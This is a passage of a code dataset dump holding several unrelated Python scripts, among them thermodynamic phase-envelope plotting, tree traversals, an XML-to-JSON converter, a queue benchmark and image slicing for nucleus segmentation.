tracer.trace()\n data = tracer.get_tracer_data()\n\n # p-x plot\n line, = ax1.plot(np.array(data.x).T[0], data.pL, label = str(T), lw = 0.5)\n ax1.plot(np.array(data.y).T[0], data.pL, color = line.get_color(), lw = 0.5)\n ax3.plot(np.array(data.x).T[0], np.array(data.rhoL), label = str(T))\n print('ISOT:', T, 'K;', len(data.pL), 'points')\n reason = tracer.get_termination_reason()\n if reason: \n print(reason)\n\n # If we didn't get to the end, see if we can do the backwards integration\n if np.max(np.array(data.x).T[0]) < 0.99:\n # Stop if the temperature is above the critical point of the pure fluid\n # In that case you cannot do the backwards calculation\n if T > vle.Props1SI('Tcrit',fluids[0]): \n continue\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_forwards_integration(False)\n tracer.trace()\n data = tracer.get_tracer_data()\n ax1.plot(np.array(data.x).T[0], data.pL, color = line.get_color(), lw = 0.5)\n ax1.plot(np.array(data.y).T[0], data.pV, color = line.get_color(), lw = 0.5)\n print('ISOT backwards',T, len(data.pL))\n except BaseException as BE:\n print(T, BE)\n\n # You could also modify this block to do a two-part integration with forwards and backwards parts\n # For my purposes this wasn't necessary\n if not only_px:\n for p in pvec:\n if p > vle.Props1SI('Pcrit', backend+'::'+fluids[1]):\n forwards = False\n else:\n forwards = True\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_P, p, backend, fluids)\n tracer.set_forwards_integration(forwards)\n tracer.trace()\n data = tracer.get_tracer_data()\n\n # T-x plot\n line, = ax2.plot(np.array(data.x).T[0], data.TL, label = '', lw = 0.5)\n ax2.plot(np.array(data.y).T[0], data.TV, color = line.get_color(), lw = 0.5)\n\n print('ISOP:', p, 'Pa;', len(data.pL),'points')\n except BaseException as BE:\n print(p, BE)\n\n # Critical line of the mixture\n crit = calc_crits(backend, fluids)\n x, Tc, pc = crit['x'],crit['Tc'],crit['pc']\n x += [1,0]\n Tc += [vle.Props1SI('Tcrit',f) for f in fluids]\n pc += [vle.Props1SI('pcrit',f) for f in fluids]\n x, Tc, pc = zip(*(sorted(zip(x, Tc, pc))))\n for lw, sty in [[1.0,'k-']]:\n ax1.plot(x, pc, sty, lw = lw)\n if not only_px: ax2.plot(x, Tc, sty, lw = lw)\n\n # plt.legend(loc='best')\n if only_px: \n axes = [ax1]\n else: \n axes = [ax1,ax2]\n for ax in axes:\n ax.set_xlim(0, 1)\n ax.set_xlabel(r'$x_{{\\rm {fld:s} }}, y_{{\\rm {fld:s} }}$ (-)'.format(fld=fluids[0]).replace(r'\\rm CO2',r'{\\rm CO_2}').replace(r'\\rm n-Hexane',r'{n-{\\rm Hexane}}') )\n\n ax1.set_yscale('log')\n ax1.set_ylabel('$p$ (Pa)')\n if not only_px: ax2.set_ylabel('$T$ (K)')\n\n if backend == 'PR' and fluids == ['Methane','n-Propane']:\n ax.set_ylim(ymin=1e6, ymax=1.5e7)\n\n if 'CO2' in fluids[0]:\n print('setting labels')\n ticks = [1e6,2e6,4e6,6e6,8e6,1e7]\n \n ax1.set_yticks(ticks)\n lbls = []\n for t in ticks:\n e = int(math.floor(math.log10(t)))\n c = int(t/10**e)\n print(c, e)\n l = r'${c:d}\\times 10^{{{e:d}}}$'.format(c=c,e=e)\n lbls.append(l)\n ax1.set_yticklabels(lbls)\n\n fig.tight_layout(pad=0.2)\n fig.savefig(backend+'_'.join(fluids)+'.pdf')\n plt.show()\n\ndef plotly_surface(fluids, Tvec, pvec):\n \"\"\"\n Construct a 3D set of lines forming the phase envelope \n with the tracer we developed and the use of the plotly \n plotting library\n \"\"\"\n\n backend = 'HEOS'\n \n data = []\n def add_trace(T,comp,p,linecolor):\n trace = go.Scatter3d(\n mode='lines',\n name=None,\n showlegend=False,\n x=T,\n y=comp,\n z=p, \n marker=dict(\n size=0,\n #color=z,\n colorscale='Viridis',\n ),\n line=dict(\n color=linecolor,\n width=5\n )\n )\n data.append(trace)\n\n for T in Tvec:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.trace()\n _data = tracer.get_tracer_data()\n\n for comp in [np.array(_data.x).T[0].tolist(),\n np.array(_data.y).T[0].tolist()]:\n add_trace(_data.TL, comp, _data.pL, linecolor = '#000000')\n\n if np.max(np.array(_data.x).T[0]) < 0.99:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_forwards_integration(False)\n tracer.trace()\n _data = tracer.get_tracer_data()\n for comp in [np.array(_data.x).T[0].tolist(),\n np.array(_data.y).T[0].tolist()]:\n add_trace(_data.TL, comp, _data.pL, linecolor = '#000000')\n\n except BaseException as BE:\n print(BE)\n\n for p in pvec:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_P, p, backend, fluids)\n tracer.trace()\n _data = tracer.get_tracer_data()\n for comp in [np.array(_data.x).T[0].tolist(),\n np.array(_data.y).T[0].tolist()]:\n add_trace(_data.TL, comp, _data.pL, linecolor = '#ff0000')\n except BaseException as BE:\n print(BE)\n\n # Critical line of the mixture\n crit = calc_crits(backend, fluids)\n x, Tc, pc = crit['x'],crit['Tc'],crit['pc']\n x += [1,0]\n Tc += [vle.Props1SI('Tcrit',f) for f in fluids]\n pc += [vle.Props1SI('pcrit',f) for f in fluids]\n x, Tc, pc = zip(*(sorted(zip(x, Tc, pc))))\n add_trace(Tc, x, pc, linecolor = '#ff00ff')\n\n layout = dict(\n width=1200,\n height=1000,\n autosize=False,\n font= {\n 'family': 'Times New Roman',\n 'size': 20,\n 'color': '#7f7f7f'\n },\n margin=dict(\n l=10,\n r=10,\n b=10,\n t=10,\n pad=4\n ),\n # title='Phase envelope',\n scene=dict(\n xaxis=dict(\n title='T (K)',\n type='linear',\n gridwidth=4,\n ),\n yaxis=dict(\n title='x, y',\n type='linear',\n gridwidth=4,\n ),\n zaxis=dict(\n title='p (Pa)',\n type='log',\n gridwidth=4,\n ),\n camera=dict(\n up=dict(\n x=0,\n y=0,\n z=1\n ),\n eye=dict(\n x=-1.7428,\n y=1.0707,\n z=0.7100,\n )\n ),\n aspectratio = dict( x=1, y=1, z=0.7 ),\n aspectmode = 'manual'\n ),\n )\n fig = dict(data=data, layout=layout)\n plotly.offline.plot(fig, filename='phase_envelope-'+'-'.join(fluids)+'.html', validate=True)\n\nif __name__=='__main__':\n vle.PropsSI('Dmolar','T',230,'Q',0,'n-Hexane')\n lowTerror(polishing = True)\n lowTerror(polishing = False)\n # lowTSO2Water()\n # speedtest()\n # plotly_surface(['CO2','Ethane'], np.arange(250, 310, 5), np.logspace(np.log10(2e6),np.log10(1e7),20))\n # plotly_surface(['n-Hexane','n-Octane'], np.arange(300, 600, 20), np.logspace(np.log10(1e4),np.log10(1e7),20))\n # CO2ethaneconcentrations()\n # MethaneEthane()\n # tocritline()\n # for fluids, Tvec, pvec, backend, only_px in [\n # # (['CO2','Ethane'], np.arange(250, 310, 5), np.logspace(np.log10(1e5),np.log10(1e8),30),'HEOS', False),\n # (['Methane','Ethane'], np.arange(150, 325, 5), np.logspace(np.log10(1e5),np.log10(1e8),30),'HEOS', True),\n # # (['n-Hexane','n-Octane'], np.linspace(300, 600, 20), np.logspace(np.log10(1e4),np.log10(1e7),20),'HEOS',False),\n # # (['Methane','n-Propane'], np.arange(200, 350, 10), np.logspace(np.log10(1e4),np.log10(1e7),30),'PR', True)\n # ]:\n # plot_isolines(fluids, Tvec, pvec, backend, only_px = only_px)","sub_path":"run_iso.py","file_name":"run_iso.py","file_ext":"py","file_size_in_byte":23942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35469950","text":"T=int(input())\nfor t in range(0,T):\n length=int(input())\n matrix=[[0]*length]*length\n string=[int(k) for k in input().split()]\n for i in range(0,length):\n for j in range(0,length):\n matrix[i][j]=string[i*length+j]\n n = len(matrix)\n r = list(zip(*matrix[::-1]))\n for i in range(n):\n for j in range(n):\n matrix[i][j] = r[i][j]\n\n \n \n ","sub_path":"Code/CodeRecords/2470/60618/303430.py","file_name":"303430.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"612189632","text":"#!/usr/bin/env python3\n'''\nUsage: skell [-o OPT...] DESTINATION\n\nSkell willl make a generic project base at DESTINATION\nthe last in the DESTINATION path will be the project name\n\nArguments:\n DESTINATION path/to/project/name\n\nOptions:\n -o OPT --opt=OPT build options\n\nThe most commonly used commands are:\n make make a project\n m same as make\n\n user make a project with a user class\n u same as user\n'''\n\nimport os\nimport re\nimport importlib\nimport importlib.util\nfrom docopt import docopt\nimport settings\n\n\ndef sanitize_base_dir(base_dir):\n ''' enforce good dir naming '''\n\n patt1 = re.compile('[-#%&{}\\<>*?&!\\'\":@]')\n\n split_base = os.path.split(base_dir)\n\n base_name = split_base[-1]\n\n print(base_name)\n if re.search(patt1, base_name):\n print('removing bad characters')\n clean_name = re.sub('\\s', '_', re.sub(patt1, '', base_name))\n else:\n clean_name = base_name\n\n if len(split_base) > 1:\n project_path = os.path.join(*split_base[:-1], clean_name)\n else:\n project_path = clean_name\n\n return clean_name, project_path\n\n\ndef build_skell(user_module, class_name, class_args):\n ''' make_skell '''\n\n if user_module:\n module_name = 'user_skells'\n path = os.path.join(\n os.environ['XDG_CONFIG_HOME'], 'skell', 'user_skells.py')\n else:\n module_name = 'default_skells'\n # get the real file path of this file (no symlinks)\n # and cut the file off (core.py)\n skell_path_s = os.path.split(os.path.realpath(__file__))[:-1]\n path = os.path.join(*skell_path_s, 'default_skells.py')\n\n # get the module\n spec = importlib.util\\\n .spec_from_file_location(module_name, path)\n\n # get the module\n # TODO: reread importlib\n module = importlib.util.module_from_spec(spec)\n\n # idk, something to do with loading the module to its one name space\n spec.loader.exec_module(module)\n\n # get the object specified\n build_class = getattr(module, class_name)\n\n # instantiate the class with all args\n # expecting project path and name at least\n # optional per class args\n instance = build_class(*class_args)\n\n # call the build method for the chosen skell\n instance.build()\n\n\ndef parse_args(args):\n clean_name, project_path = sanitize_base_dir(args['DESTINATION'])\n\n # set the build class name\n if args['--python']:\n class_name = 'Python'\n\n elif args['--gitignore']:\n class_name = 'GitIgnore'\n\n elif args['--javascript']:\n class_name = 'JavaScript'\n\n elif args['--venv']:\n class_name = 'Venv'\n\n elif args['--blank']:\n class_name = 'BlankProject'\n\n elif args['SKELL_TYPE']:\n class_name = args['SKELL_TYPE']\n\n # get default project class from settings\n elif args['--one']:\n class_name = settings.FLAG_ONE\n elif args['--two']:\n class_name = settings.FLAG_TWO\n elif args['--three']:\n class_name = settings.FLAG_THREE\n\n # set class args\n if not args['--opt']:\n class_args = [project_path, clean_name]\n elif args['--opt']:\n class_args = [project_path, clean_name, *args['--opt'].split(',')]\n\n return class_name, class_args\n\n\ndef lord_func(args):\n ''' the start function '''\n\n # parse args and get all build options\n # class_name, class_args, = parse_args(args)\n\n # pass options to build class\n # build_skell(class_name, class_args)\n\n # --module is ether True or None\n # user_module = args['--module']\n\n build_args = parse_args(args)\n return\n\n build_skell(args['--module'], *build_args)\n\n\nif __name__ == '__main__':\n args = docopt(__doc__)\n print(args)\n lord_func(args)\n","sub_path":"docs/keep.py","file_name":"keep.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306211590","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport os \r\nimport pandas as pd\r\n\r\nos.chdir('C:\\\\Users\\\\shimm\\\\downloads')\r\n\r\n\r\n# plague_by_word = open(\"plague_by_word.txt\", \"w\")\r\n#new_plague = open(\"newplague.txt\", \"w\")\r\nwith open(\"Camus Albert - The Plague.txt\") as f:\r\n flat = f.readlines()\r\nfor line in range(len(flat)) :\r\n if flat[line] != \"\\n\":\r\n words = flat[line].split(\" \")\r\n for word in words:\r\n if word != \"\\n\":\r\n new_plague.write(word + \"\\n\")\r\n#the seperated files of parts where created manually from new_plague.txt\r\ndf_part_1 = pd.read_csv(\"plague_part_1_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_2 = pd.read_csv(\"plague_part_2_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_3 = pd.read_csv(\"plague_part_3_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_4 = pd.read_csv(\"plague_part_4_new\", sep=\"\\n\", encoding='latin-1')\r\ndf_part_5 = pd.read_csv(\"plague_part_5_new\", sep=\"\\n\", encoding='latin-1')\r\n\r\np1_lst = [\"part_1\"] * len(df_part_1)\r\np2_lst = [\"part_2\"] * len(df_part_2)\r\np3_lst = [\"part_3\"] * len(df_part_3)\r\np4_lst = [\"part_4\"] * len(df_part_4)\r\np5_lst = [\"part_5\"] * len(df_part_5)\r\n \r\ndf_part_1[\"part\"] = p1_lst\r\ndf_part_2[\"part\"] = p2_lst\r\ndf_part_3[\"part\"] = p3_lst\r\ndf_part_4[\"part\"] = p4_lst\r\ndf_part_5[\"part\"] = p5_lst\r\n\r\ndf = pd.concat([df_part_1, df_part_2, df_part_3, df_part_4, df_part_5])\r\ndf['count'] = range(1, len(df) + 1)\r\ndf[\"new_column\"] = df['Word'].str.replace('[^\\w\\s]','') \r\ndf= df.applymap(lambda s:s.lower() if type(s) == str else s)\r\n\r\ndf.to_csv(\"plague_by_part_by_word.csv\")\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"dig_hum_py_cleaning.py","file_name":"dig_hum_py_cleaning.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"425154200","text":"import sys \nsys.path.append('../intcode')\n\nimport intcode\n\nwith open(\"day2.input\") as file:\n program = [int(val) for val in file.read().split(',')]\n\nprogram[1] = 12\nprogram[2] = 2\n\ncomputer = intcode.IntCode()\ncomputer.load_program(program)\ncomputer.run_program()\nprint(computer.memory[0])\nprint(computer.memory)\n\nwanted = 19690720\n\nfor noun in range(0,100):\n for verb in range(0,100):\n program[1] = noun\n program[2] = verb\n computer.load_program(program)\n computer.run_program()\n if (computer.memory[0] == wanted):\n print(100*noun+verb)\n sys.exit(0)\n\nprint(\"Not found\")\n","sub_path":"2/day2_intcode.py","file_name":"day2_intcode.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"532707180","text":"from ConfigSpace.configuration_space import ConfigurationSpace\r\nfrom ConfigSpace.hyperparameters import UniformFloatHyperparameter, \\\r\n UniformIntegerHyperparameter, CategoricalHyperparameter, \\\r\n UnParametrizedHyperparameter, Constant\r\nfrom automl.utl import json_utils\r\n\r\ncs = ConfigurationSpace()\r\n\r\n# the smoothing parameter is a non-negative float\r\n# I will limit it to 1000 and put it on a logarithmic scale. (SF)\r\n# Please adjust that, if you know a proper range, this is just a guess.\r\nalpha = UniformFloatHyperparameter(name=\"alpha\", lower=1e-2, upper=100,\r\n default_value=1, log=True)\r\n\r\nfit_prior = CategoricalHyperparameter(name=\"fit_prior\",\r\n choices=[\"True\", \"False\"],\r\n default_value=\"True\")\r\n\r\ncs.add_hyperparameters([alpha, fit_prior])\r\n\r\njson_utils.write_cs_to_json_file(cs, \"BernoulliNB\")\r\n","sub_path":"examples/components_json_generator/classification_json_generator/bernoulli_NB.py","file_name":"bernoulli_NB.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535336109","text":"from io import open\nfrom os import path as op\n\nfrom setuptools import setup\n\nbasedir = op.abspath(op.dirname(__file__))\nversion = open(op.join(basedir, \"VERSION\")).read().strip()\n\nsetup(\n name=\"CrackerJack\",\n version=version,\n packages=[\"crackerjack\"],\n test_suite=\"pytest\",\n include_package_data=True,\n license=\"BSD 3-clause\",\n versions=[version],\n py_modules=[\"crackerjack\"],\n description=\"PEP 8000 - crackerjack code formatting style.\",\n long_description=open(op.join(basedir, \"README.md\")).read(),\n long_description_content_type=\"text/markdown\",\n url=\"https://gitlab.com/lesleslie/crackerjack\",\n author=\"Les Leslie\",\n author_email=\"les@wedgwoodwebworks.com\",\n maintainer=\"Les Leslie\",\n maintainer_email=\"les@wedgwoodwebworks.com\",\n entry_points={\n \"console_scripts\": [\"crackerjack=crackerjack.crackerjack:crackerjack\"]\n },\n classifiers=[\n \"Environment :: Console\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.7\",\n ],\n keywords=\"black\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182477348","text":"import xml.etree.ElementTree as ET\nimport xmltodict\nimport json\n\n''' This program converts an xml file to json \n XML can be tricky to convert; this may need some more testing\n Source: https://towardsdatascience.com/the-easy-way-to-work-with-csv-json-and-xml-in-python-5056f9325ca9\n \n Online XML to JSON converter: http://www.utilities-online.info/xmltojson/#.XuDTRs9Kjw8\n \n'''\n\ntree = ET.parse('data/books.xml')\nxml_data = tree.getroot()\n\nxmlstr = ET.tostring(xml_data, encoding='utf8', method='xml')\n\n\ndata_dict = dict(xmltodict.parse(xmlstr))\n\nprint(data_dict)\n\nwith open('data/new_data_2.json', 'w+') as json_file:\n json.dump(data_dict, json_file, indent=4, sort_keys=True)\n ","sub_path":"convert_xml_to_csv.py","file_name":"convert_xml_to_csv.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"95551866","text":"# python3\n\"\"\"\nYou are given a rooted binary tree.\nBuild and output its in-order, pre-order and post-order traversals.\n\nThis version turned out to work slower than tree_traversal2.py\n\"\"\"\nimport sys\nimport threading\n\nsys.setrecursionlimit(10 ** 6) # max depth of recursion\nthreading.stack_size(2 ** 27) # new thread will get stack of such size\n\n\ndef walk(f):\n res = []\n\n def wrapper(*args):\n res.extend(i for i in f(*args))\n return res\n\n return wrapper\n\n\nclass TreeOrders:\n def __init__(self):\n next(sys.stdin)\n self.tree = [tuple(map(int, line.split())) for line in sys.stdin]\n\n @walk\n def in_order(self, i):\n stack = []\n while i != -1:\n stack.append(i)\n i = self.tree[i][1]\n\n while stack:\n i = stack.pop()\n yield self.tree[i][0]\n\n if self.tree[i][2] != -1:\n self.in_order(self.tree[i][2])\n\n @walk\n def pre_order(self, i):\n stack = []\n while i != -1:\n yield self.tree[i][0]\n stack.append(i)\n i = self.tree[i][1]\n\n while stack:\n i = stack.pop()\n if self.tree[i][2] != -1:\n self.pre_order(self.tree[i][2])\n\n @walk\n def post_order(self, i):\n stack = []\n while i != -1:\n stack.append(i)\n i = self.tree[i][1]\n\n while stack:\n i = stack.pop()\n if self.tree[i][2] != -1:\n self.post_order(self.tree[i][2])\n\n yield self.tree[i][0]\n\n\ndef main():\n tree = TreeOrders()\n print(*tree.in_order(0))\n print(*tree.pre_order(0))\n print(*tree.post_order(0))\n\n\nthreading.Thread(target=main).start()\n","sub_path":"data_structures/binary_search_trees/tree_traversals/tree_traversal.py","file_name":"tree_traversal.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"29107419","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 6 16:58:22 2018\n\n@author: xavier.qiu\n\"\"\"\n\n#class PreProcess(object):\n# \n# def sliceImg(image_, mask_imgs, output_shape = (256,256), img_id = '', dirPath = ''):\n# if dirPath == '':\n# dirPath = os.getcwd()\n# \n# rows = (int)((image_.shape[0]-1) / output_shape[0])+1\n# cols = (int)((image_.shape[1]-1) / output_shape[1])+1\n# \n# for y in range(rows):\n# y_end = (y+1) * output_shape[0]\n# if y == rows - 1:\n# y_end = image_.shape[0]\n# for x in range(cols):\n# x_end = (x+1) * output_shape[1]\n# if x == cols - 1:\n# x_end = image_.shape[1]\n# print(y_end)\n# print(x_end)\n# img_temp = img[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n# \n# valid_mask = list()\n# for mask in mask_imgs:\n# mask_temp = mask[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n# if np.any(mask_temp):\n# valid_mask.append(mask_temp)\n# if len(valid_mask) == 0:\n# continue\n# else:\n# id__ = 'i' + getNameFromTime()\n# os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__))\n# os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'))\n# os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'))\n# \n# path___ = os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'+id__+'.png')\n# imsave(path___,img_temp)\n# for mask_ in valid_mask:\n# mask_id = 'm'+ getNameFromTime()\n# path__m = os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'+mask_id+'.png')\n# imsave(path__m,mask_)\n#\n# \n# def __init__(self, \n# remove_errorness = False,\n# shape_after_slice = (256,256),\n# processed = False):\n# self.remove_errorness = remove_errorness\n# self.shape_after_slice = shape_after_slice\n# self.processed = processed\n# \n# def preprocess(self, preprocess_again = False):\n# \n# IMG_CHANNELS = 3\n#\n# if self.processed and not preprocess_again:\n# pass\n# \n## os.system('rm -rf stage1_train_copy')\n## os.system('mkdir stage1_train_copy')\n## dir_util.copy_tree('stage1_train/','stage1_train_copy/')\n# \n# #1. \n# \n# os.system('rm -rf stage1_train_copy')\n# os.system('mkdir stage1_train_copy')\n# \n# cwd = os.getcwd()\n# TRAIN_PATH = 'stage1_train/'\n# TEST_PATH = 'stage1_test/'\n# \n# train_ids = next(os.walk(TRAIN_PATH))[1]\n# test_ids = next(os.walk(TEST_PATH))[1]\n# \n# print('Getting and resizing train images and masks ... ')\n# \n# for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):\n# path = TRAIN_PATH + id_\n# image__ = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\n## print(img.shape)\n# mask_imgs = list()\n# temp_imgs = next(os.walk(path+'/masks/'))[2]\n# assert len(temp_imgs) > 0\n# for mask in temp_imgs:\n# mask_img = imread(path+'/masks/'+mask)\n# mask_imgs.append(mask_img)\n# self.sliceImg(image__,mask_imgs,img_id = id_)\n# \n#\n#pp = PreProcess()\n#pp.preprocess()\n\n#%%\nimport os\nfrom tqdm import tqdm\nfrom skimage.io import imread, imsave\nimport numpy as np\nimport datetime\nimport cv2\n\nproblem_ids = list()\n'''problem_ids.append('7b38c9173ebe69b4c6ba7e703c0c27f39305d9b2910f46405993d2ea7a963b80')\nproblem_ids.append('b1eb0123fe2d8c825694b193efb7b923d95effac9558ee4eaf3116374c2c94fe')\nproblem_ids.append('9bb6e39d5f4415bc7554842ee5d1280403a602f2ba56122b87f453a62d37c06e')\nproblem_ids.append('1f0008060150b5b93084ae2e4dabd160ab80a95ce8071a321b80ec4e33b58aca')\nproblem_ids.append('58c593bcb98386e7fd42a1d34e291db93477624b164e83ab2afa3caa90d1d921')\nproblem_ids.append('adc315bd40d699fd4e4effbcce81cd7162851007f485d754ad3b0472f73a86df')\nproblem_ids.append('12aeefb1b522b283819b12e4cfaf6b13c1264c0aadac3412b4edd2ace304cb40')\nproblem_ids.append('0a7d30b252359a10fd298b638b90cb9ada3acced4e0c0e5a3692013f432ee4e9')\n'''\n\ndef getNameFromTime():\n now = datetime.datetime.now()\n return (str)(now.minute)+(str)(now.second) + (str)(now.microsecond)\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nIMG_CHANNELS = 3\n \ndef sliceImg(img, mask_imgs, output_shape = (256,256), img_id = '', dirPath = ''):\n \n \"\"\"\n slice an image into several 256 * 256, \n for example, for a 360*360 image, we will divide it into 4 subimages to feed to model\n cause compression will loss some information that we can make use of, so \n \"\"\"\n \n if dirPath == '':\n dirPath = os.getcwd()\n \n rows = (int)((img.shape[0]-1) / output_shape[0])+1\n cols = (int)((img.shape[1]-1) / output_shape[1])+1\n \n for y in range(rows):\n y_end = (y+1) * output_shape[0]\n if y == rows - 1:\n y_end = img.shape[0]\n for x in range(cols):\n x_end = (x+1) * output_shape[1]\n if x == cols - 1:\n x_end = img.shape[1]\n# print(y_end)\n# print(x_end)\n img_temp = img[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n# plt.figure()\n# plt.imshow(img_temp)\n \n valid_mask = list()\n for mask in mask_imgs:\n mask_temp = mask[y_end - output_shape[0]: y_end, x_end - output_shape[1]: x_end]\n if np.any(mask_temp):\n valid_mask.append(mask_temp)\n if len(valid_mask) == 0:\n continue\n else:\n id__ = 'i' + getNameFromTime()\n os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__))\n os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'))\n os.mkdir(os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'))\n \n path___ = os.path.join(dirPath,'stage1_train_copy/'+id__+'/images/'+id__+'.png')\n imsave(path___,img_temp)\n for mask_ in valid_mask:\n mask_id = 'm'+ getNameFromTime()\n path__m = os.path.join(dirPath,'stage1_train_copy/'+id__+'/masks/'+mask_id+'.png')\n imsave(path__m,mask_)\n \n\nos.system('rm -rf stage1_train_copy')\nos.system('mkdir stage1_train_copy')\nTRAIN_PATH = 'stage1_train/'\nTEST_PATH = 'stage1_test/'\n\ntrain_ids = next(os.walk(TRAIN_PATH))[1]\n#test_ids = next(os.walk(TEST_PATH))[1]\n\nprint('Getting and resizing train images and masks ... ')\n\nfor n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):\n \n if id_ in problem_ids:\n continue\n \n path = TRAIN_PATH + id_\n if not os.path.exists(path + '/masks/') or os.listdir(path+'/masks/') == [] :\n continue\n image__ = cv2.imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\n if image__.shape[0] <= 256 and image__.shape[1] <= 256:\n continue\n if image__.shape[0] < 256 or image__.shape[1] < 256:\n continue\n mask_imgs = list()\n \n \n temp_imgs = next(os.walk(path+'/masks/'))[2]\n assert len(temp_imgs) > 0\n for mask in temp_imgs:\n mask_img = cv2.imread(path+'/masks/'+mask)\n mask_imgs.append(mask_img)\n\n sliceImg(image__,mask_imgs,img_id = id_)","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521256514","text":"import queue\nimport random\nimport threading\nimport time\n\nimport pandas as pd\n\nNUMBER_OF_EVENTS = 100000\nBATCH_SIZE_TO_USE_IN_TPS_CALCULATION = 10000\n\n\ndef event_producer(number_of_events):\n event_counter = 0\n while True:\n event_data = {\"time\": time.time(), \"obs_id\": random.randint(1, 30), \"throughput\": random.randint(1, 5000)}\n event_counter = event_counter + 1\n event_queue.put(event_data)\n if event_counter == number_of_events:\n event_queue.task_done()\n break\n\n\ndef event_taker(tps_calculation_batch_size, number_of_events):\n start_time = time.time();\n event_batch_count = 0\n total_event_count = 0\n tps_values = {}\n sum_time = 0\n while True:\n item = event_queue.get()\n event_batch_count = event_batch_count + 1\n total_event_count = total_event_count + 1\n if event_batch_count == tps_calculation_batch_size:\n end_time = time.time();\n sum_time = (end_time - start_time + sum_time)\n tps_values[round((sum_time * 1000), 2)] = round(get_tps(tps_calculation_batch_size, end_time, start_time),2)\n start_time = end_time\n event_batch_count = 0\n if total_event_count == number_of_events:\n tps_data_frame = pd.DataFrame(tps_values.items(), columns=['Time (ms)', 'TPS (requests/second)'])\n tps_data_frame.to_csv(\"single-queue-single-reader.csv\", encoding='utf-8', index=False)\n print(tps_data_frame)\n break\n\n\ndef get_tps(tps_calculation_batch_size, end_time, start_time):\n return tps_calculation_batch_size / (end_time - start_time)\n\n\nevent_queue = queue.Queue()\nthreading.Thread(target=event_taker, args=(BATCH_SIZE_TO_USE_IN_TPS_CALCULATION, NUMBER_OF_EVENTS,),\n daemon=True).start()\n\nthreading.Thread(target=event_producer, args=(NUMBER_OF_EVENTS,), daemon=True).start()\n\n\nevent_queue.join()\n","sub_path":"queue_single_writer_single_reader.py","file_name":"queue_single_writer_single_reader.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"241002875","text":"# -------------------------------------------------------------------------\n# The CodeChecker Infrastructure\n# This file is distributed under the University of Illinois Open Source\n# License. See LICENSE.TXT for details.\n# -------------------------------------------------------------------------\n\n\"\"\"\nCalculates call statistics from analysis output\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import BytesIO as StringIO\nfrom collections import defaultdict\nimport os\nimport re\n\nfrom codechecker_common.logger import get_logger\n\nfrom ..flag import has_flag\nfrom ..flag import prepend_all\n\nLOG = get_logger('analyzer')\n\n\ndef build_stat_coll_cmd(action, config, source):\n \"\"\"\n Build the statistics collector analysis command.\n \"\"\"\n\n cmd = [config.analyzer_binary, '-c', '-x', action.lang, '--analyze',\n # Do not warn about the unused gcc/g++ arguments.\n '-Qunused-arguments',\n '--analyzer-output', 'text']\n\n for plugin in config.analyzer_plugins:\n cmd.extend([\"-Xclang\", \"-plugin\",\n 